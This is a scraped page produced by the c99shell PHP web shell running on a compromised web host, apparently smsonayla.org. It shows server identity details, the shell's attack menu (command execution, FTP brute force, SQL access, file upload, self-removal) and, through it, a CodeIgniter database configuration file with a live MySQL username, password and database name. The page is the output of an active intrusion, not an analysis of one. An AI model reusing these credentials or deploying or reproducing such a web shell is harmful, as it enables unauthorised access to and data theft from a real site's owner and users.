smsonayla.org - c99shell

!C99Shell v.2.1 [PHP 7 Update] [1.12.2019]!

Software: LiteSpeed. PHP/7.4.33 

uname -a: Linux server704.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13
UTC 2025 x86_64
 

uid=1309(necipbey) gid=1314(necipbey) groups=1314(necipbey) 

Safe-mode: OFF (not secure)

/home/necipbey/public_html/app/Config/   drwxr-xr-x
Free 3473.26 GB of 4265.01 GB (81.44%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     Database.php (2.47 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Config;

use 
CodeIgniter\Database\Config;

/**
 * Database Configuration
 */
class Database extends Config
{
    
/**
     * The directory that holds the Migrations
     * and Seeds directories.
     *
     * @var string
     */
    
public $filesPath APPPATH 'Database' DIRECTORY_SEPARATOR;

    
/**
     * Lets you choose which connection group to
     * use if no other is specified.
     *:
     * @var string
     */
    
public $defaultGroup 'default';

    
/**
     * The default database connection.
     *
     * @var array
     */
    
public $default = [
        
'DSN'      => '',
        
'hostname' => 'localhost',
        
'username' => 'necipbey_b'//veritabanı kullanıcı
        
'password' => '&n=RHT[u4v9N'//veritabanı şifre
        
'database' => 'necipbey_bb'//veritabanı adı
        
'DBDriver' => 'MySQLi',
        
'DBPrefix' => '',
        
'pConnect' => false,
        
'DBDebug'  => (ENVIRONMENT !== 'production'),
        
'charset'  => 'utf8',
        
'DBCollat' => 'utf8_general_ci',
        
'swapPre'  => '',
        
'encrypt'  => false,
        
'compress' => false,
        
'strictOn' => false,
        
'failover' => [],
        
'port'     => 3306,
    ];

    
/**
     * This database connection is used when
     * running PHPUnit database tests.
     *
     * @var array
     */
    
public $tests = [
        
'DSN'         => '',
        
'hostname'    => '127.0.0.1',
        
'username'    => '',
        
'password'    => '',
        
'database'    => ':memory:',
        
'DBDriver'    => 'SQLite3',
        
'DBPrefix'    => 'db_',  // Needed to ensure we're working correctly with prefixes live. DO NOT REMOVE FOR CI DEVS
        
'pConnect'    => false,
        
'DBDebug'     => (ENVIRONMENT !== 'production'),
        
'charset'     => 'utf8',
        
'DBCollat'    => 'utf8_general_ci',
        
'swapPre'     => '',
        
'encrypt'     => false,
        
'compress'    => false,
        
'strictOn'    => false,
        
'failover'    => [],
        
'port'        => 3306,
        
'foreignKeys' => true,
    ];

    public function 
__construct()
    {
        
parent::__construct();

        
// Ensure that we always set the database group to 'tests' if
        // we are currently running an automated test suite, so that
        // we don't overwrite live data on accident.
        
if (ENVIRONMENT === 'testing') {
            
$this->defaultGroup 'tests';
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v.2.1 [PHP 7 Update] [1.12.2019] maintained by KaizenLouie and updated by cermmik | C99Shell Github (MySQL update) | Generation time: 0.0089 ]--